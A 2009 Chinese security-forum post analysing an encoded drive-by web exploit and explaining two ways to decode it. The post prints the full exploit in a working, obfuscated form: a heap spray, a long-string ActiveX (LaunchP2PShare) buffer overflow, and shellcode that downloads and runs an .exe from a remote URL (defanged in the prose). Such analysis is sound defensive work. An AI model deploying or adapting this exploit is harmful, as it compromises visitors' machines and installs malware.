瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 有奖解密网马简要分析
networkedition - 2009-6-3 9:22:00
我们来简要分析一下这个加密代码,共有两种解密方式,下面来详细讲解一下:

<script>
t="60,33,45,45,32,32,97,120,105,115,39,32,101,120,112,108,111,105,116,33,32,32,45,45,62,13,10,13,10,60,104,116,109,108,62,13,10,60,104,101,97,100,62,13,10,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,106,97,118,97,115,99,114,105,112,116,34,62,13,10,9,118,97,114,32,104,101,97,112,83,112,114,97,121,84,111,65,100,100,114,101,115,115,32,61,32,48,120,48,99,48,49,48,49,48,49,59,13,10,9,118,97,114,32,115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,34,43,34,37,117,57,48,57,48,34,43,32,13,10,34,37,117,54,52,54,48,37,117,51,48,97,49,37,117,48,48,48,48,37,117,56,98,48,48,37,117,48,99,52,48,37,117,55,48,56,98,37,117,97,100,49,99,37,117,55,48,56,98,34,32,43,13,10,34,37,117,56,49,48,56,37,117,48,48,101,99,37,117,48,48,48,52,37,117,56,98,48,48,37,117,53,54,101,99,37,117,56,101,54,56,37,117,48,101,52,101,37,117,101,56,101,99,34,32,43,13,10,34,37,117,48,48,102,102,37,117,48,48,48,48,37,117,52,53,56,57,37,117,53,54,48,52,37,117,57,56,54,56,37,117,56,97,102,101,37,117,101,56,48,101,37,117,48,48,102,49,34,32,43,13,10,34,37,117,48,48,48,48,37,117,52,53,56,57,37,117,53,54,48,56,37,117,50,53,54,56,37,117,102,102,98,48,37,117,101,56,99,50,37,117,48,48,101,51,37,117,48,48,48,48,34,32,43,13,10,34,37,117,52,53,56,57,37,117,53,54,48,99,37,117,101,102,54,56,37,117,101,48,99,101,37,117,101,56,54,48,37,117,48,48,100,53,37,117,48,48,48,48,37,117,52,53,56,57,34,32,43,13,10,34,37,117,53,54,49,48,37,117,99,49,54,56,37,117,101,53,55,57,37,117,101,56,98,56,37,117,48,48,99,55,37,117,48,48,48,48,37,117,52,53,56,57,37,117,52,48,49,52,34,32,43,13,10,34,37,117,51,56,56,48,37,117,55,53,99,51,37,117,56,57,102,97,37,117,49,56,52,53,37,117,48,56,101,57,37,117,48,48,48,49,37,117,53,101,48,48,37,117,55,53,56,57,34,32,43,13,10,34,37,117,56,98,50,52,37,117,48,52,52,53,37,117,48,49,54,97,37,117,56,98,53,57,37,117,49,56,53,53,37,117,101,56,53,54,37,117,48,48,56,99,37,117,48,48,48,48,34,32,43,13,10,34,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,57,56,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,99,53,56,98,34,32,43,13,10,34,37,117,99,48,56,51,37,117,56,57,53,48,37,117,50,48,52,53,37,117,102,102,54,56,37,117,48,48,48,48,37,117,53,48,48,48,37,117,52,53,56,98,37,117,54,97,49,52,34,32,43,13,10,34,37,117,53,57,48,50,37,117,53,53,56,98,37,117,101,56,49,56,37,117,48,48,54,50,37,117,48,48,48,48,37,117,52,53,48,51,37,117,99,55,50,48,37,117,53,99,48,48,34,32,43,13,10,34,37,117,50,101,55,101,37,117,99,55,54,53,37,117,48,52,52,48,37,117,54,53,55,56,37,117,48,48,48,48,37,117,55,53,102,102,37,117,56,98,50,48,37,117,48,99,52,53,34,32,43,13,10,34,37,117,48,49,54,97,37,117,56,98,53,57,37,117,49,56,53,53,37,117,52,49,101,56,37,117,48,48,48,48,37,117,54,97,48,48,37,117,53,56,48,55,37,117,52,53,48,51,34,32,43,13,10,34,37,117,51,51,50,52,37,117,53,51,100,98,37,117,102,102,53,51,37,117,50,48,55,53,37,117,53,51,53,48,37,117,52,53,56,98,37,117,54,97,49,99,37,117,53,57,48,53,34,32,43,13,10,34,37,117,53,53,56,98,37,117,101,56,49,56,37,117,48,48,50,52,37,117,48,48,48,48,37,117,48,48,54,97,37,117,55,53,102,102,37,117,56,98,50,48,37,117,48,56,52,53,34,32,43,13,10,34,37,117,48,50,54,97,37,117,56,98,53,57,37,117,49,56,53,53,37,117,49,49,101,56,37,117,48,48,48,48,37,117,56,49,48,48,37,117,48,48,99,52,37,117,48,48,48,52,34,32,43,13,10,34,37,117,54,49,48,48,37,117,99,52,56,49,37,117,48,52,100,99,37,117,48,48,48,48,37,117,99,50,53,100,37,117,48,48,50,52,37,117,53,98,52,49,37,117,48,51,53,50,34,32,43,13,10,34,37,117,48,51,101,49,37,117,48,51,101,49,37,117,48,51,101,49,37,117,56,51,101,49,37,117,48,52,101,99,37,117,53,51,53,97,37,117,100,97,56,98,37,117,102,55,101,50,34,32,43,13,10,34,37,117,102,102,53,50,37,117,53,53,101,48,37,117,101,99,56,98,37,117,55,100,56,98,37,117,56,98,48,56,37,117,48,99,53,100,37,117,56,98,53,54,37,117,51,99,55,51,34,32,43,13,10,34,37,117,55,52,56,98,37,117,55,56,49,101,37,117,102,51,48,51,37,117,56,98,53,54,37,117,50,48,55,54,37,117,102,51,48,51,37,117,99,57,51,51,37,117,52,49,52,57,34,32,43,13,10,34,37,117,48,51,97,100,37,117,53,54,99,51,37,117,102,54,51,51,37,117,98,101,48,102,37,117,51,97,49,48,37,117,55,52,102,50,37,117,99,49,48,56,37,117,48,100,99,101,34,32,43,13,10,34,37,117,102,50,48,51,37,117,101,98,52,48,37,117,51,98,102,49,37,117,53,101,102,101,37,117,101,53,55,53,37,117,56,98,53,97,37,117,56,98,101,98,37,117,50,52,53,97,34,32,43,13,10,34,37,117,100,100,48,51,37,117,56,98,54,54,37,117,52,98,48,99,37,117,53,97,56,98,37,117,48,51,49,99,37,117,56,98,100,100,37,117,56,98,48,52,37,117,99,53,48,51,34,32,43,13,10,34,37,117,53,100,53,101,37,117,48,56,99,50,37,117,101,56,48,48,37,117,102,101,102,51,37,117,102,102,102,102,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,101,52,102,34,32,43,13,10,34,37,117,54,56,48,48,37,117,55,52,55,52,37,117,51,97,55,48,37,117,50,102,50,102,37,117,55,55,55,55,37,117,50,101,55,55,37,117,55,55,54,100,37,117,50,101,55,50,34,32,43,13,10,34,37,117,54,102,54,55,37,117,50,101,55,54,37,117,54,101,54,51,37,117,54,97,50,102,37,117,55,55,55,51,37,117,50,102,54,100,37,117,54,101,52,57,37,117,55,52,54,53,34,32,43,13,10,34,37,117,55,53,55,48,37,117,54,53,54,102,37,117,54,53,50,101,37,117,54,53,55,56,37,117,48,48,48,48,34,41,59,13,10,13,10,118,97,114,32,104,101,97,112,66,108,111,99,107,83,105,122,101,32,61,32,48,120,49,48,48,48,48,48,59,13,10,118,97,114,32,112,97,121,76,111,97,100,83,105,122,101,32,61,32,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,32,42,32,50,59,13,10,118,97,114,32,115,112,114,97,121,83,108,105,100,101,83,105,122,101,32,61,32,104,101,97,112,66,108,111,99,107,83,105,122,101,32,45,32,40,112,97,121,76,111,97,100,83,105,122,101,43,48,120,51,56,41,59,13,10,118,97,114,32,115,112,114,97,121,83,108,105,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,57,48,57,48,34,41,59,13,10,115,112,114,97,121,83,108,105,100,101,32,61,32,103,101,116,83,112,114,97,121,83,108,105,100,101,40,115,112,114,97,121,83,108,105,100,101,44,115,112,114,97,121,83,108,105,100,101,83,105,122,101,41,59,13,10,104,101,97,112,66,108,111,99,107,115,32,61,32,40,104,101,97,112,83,112,114,97,121,84,111,65,100,100,114,101,115,115,32,45,32,48,120,49,48,48,48,48,48,41,47,104,101,97,112,66,108,111,99,107,83,105,122,101,59,13,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,13,10,13,10,102,111,114,32,40,105,61,48,59,105,60,104,101,97,112,66,108,111,99,107,115,59,105,43,43,41,13,10,123,13,10,9,9,109,101,109,111,114,121,91,105,93,32,61,32,115,112,114,97,121,83,108,105,100,101,32,43,32,115,104,101,108,108,99,111,100,101,59,13,10,125,13,10,102,117,110,99,116,105,111,110,32,103,101,116,83,112,114,97,121,83,108,105,100,101,40,115,112,114,97,121,83,108,105,100,101,44,32,115,112,114,97,121,83,108,105,100,101,83,105,122,101,41,13,10,123,13,10,9,119,104,105,108,101,32,40,115,112,114,97,121,83,108,105,100,101,46,108,101,110,103,116,104,42,50,60,115,112,114,97,121,83,108,105,100,101,83,105,122,101,41,13,10,9,123,13,10,9,9,115,112,114,97,121,83,108,105,100,101,32,43,61,32,115,112,114,97,121,83,108,105,100,101,59,13,10,9,125,13,10,9,115,112,114,97,121,83,108,105,100,101,32,61,32,115,112,114,97,121,83,108,105,100,101,46,115,117,98,115,116,114,105,110,103,40,48,44,115,112,114,97,121,83,108,105,100,101,83,105,122,101,47,50,41,59,13,10,9,114,101,116,117,114,110,32,115,112,114,97,121,83,108,105,100,101,59,13,10,125,13,10,13,10,60,47,115,99,114,105,112,116,62,13,10,13,10,60,115,99,114,105,112,116,62,13,10,102,117,110,99,116,105,111,110,32,100,111,84,101,115,116,40,41,13,10,123,13,10,9,99,111,109,46,76,97,117,110,99,104,80,50,80,83,104,97,114,101,40,34,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,66,66,66,66,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,92,120,48,99,34,44,32,49,48,48,48,48,41,59,13,10,13,10,125,13,10,60,47,115,99,114,105,112,116,62,13,10,60,47,104,101,97,100,62,13,10,60,79,66,74,69,67,84,32,73,68,61,34,99,111,109,34,32,67,76,65,83,83,73,68,61,34,67,76,83,73,68,58,123,65,67,51,65,51,54,65,56,45,57,66,70,70,45,52,49,48,65,45,65,51,51,68,45,50,50,55,57,70,70,69,66,54,57,68,50,125,34,62,60,47,79,66,74,69,67,84,62,13,10,60,115,99,114,105,112,116,62,106,97,118,97,115,99,114,105,112,116,58,100,111,84,101,115,116,40,41,59,60,47,115,99,114,105,112,116,62,13,10,60,47,104,116,109,108,62,13,10"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>


1. 我们先来看一下t等于后面的这么一长串数字,这些都是0~10之间的阿拉伯数字,且没有字母,实际上这是十进制加密,这种进制类加密方法在早期网马加密中很常见。

2. 既然已经分析出是十进制加密,那么我们通过什么方法来解密呢,可以通过在线解密工具。具体方法,将t等于后面的一长串数字复制粘贴至在线解密工具操作区。详见截图:



在这里需要注意一下,只需复制t等于后面一长串数字,要去除其余字符。

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2009-6-3 9:23:00
下图为解密之后结果,我们看到解密结果实际是一段shellcode,接下来将要解密shellcode部分复制


%u9090"+"%u9090"+
"%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
"%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
"%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
"%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
"%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
"%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
"%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
"%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
"%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
"%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
"%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
"%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
"%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
"%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
"%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
"%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
"%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
"%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
"%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
"%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
"%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
"%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
"%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
"%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
"%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u776d%u2e72" +
"%u6f67%u2e76%u6e63%u6a2f%u7773%u2f6d%u6e49%u7465" +
"%u7570%u656f%u652e%u6578%u0000"


networkedition - 2009-6-3 9:23:00
这段shellcode中有很多标点符号及算术符号,我们简单处理一下,小技巧我们将这段shellcode复制粘贴至记事本,通过替换功能(也可使用freshow的replace功能),将不必要字符都替换为空(被替换内容不输入任何内容)(注:不是空格字符),这也是在日常解密中经常使用到的方法。


%u9090%u9090
%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b
%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec
%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1
%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000
%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589
%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014
%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589
%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000
%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b
%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14
%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00
%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45
%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503
%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905
%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845
%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004
%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352
%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2
%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73
%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149
%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce
%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a
%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503
%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f
%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u776d%u2e72
%u6f67%u2e76%u6e63%u6a2f%u7773%u2f6d%u6e49%u7465
%u7570%u656f%u652e%u6578%u0000


将整理好的shellcode粘贴至freshow上操作区,通过两次esc解密出网马地址:hxxp://www.mwr.gov.cn/jswm/Inetpuoe.exe
networkedition - 2009-6-3 9:23:00
接下来讲解第二种解密方法,我们看到这段加密代码中有我们熟悉的eval和document.write这两个函数,且已知这两种加密形式解密方法,到底是将哪个替换为alert呢,简单分析一下

t=eval("String.fromCharCode("+t+")");
document.write(t)

String.fromCharCode 功能就是把ascii码转成字符串,然后eval就是把该字符串解析成javascript语句来执行

我们大致应该明白这两段语句是做什么用的,在这里我们只需将document.write替换为alert,保存为htm格式直接运行,即可得到方法一的shellcode,后续解密方法和方法一雷同,在这里不在详细讲解。
09kaka - 2009-6-3 10:28:00
学习了~  按照方法成功解开 :kaka12:
1
查看完整版本: 有奖解密网马简要分析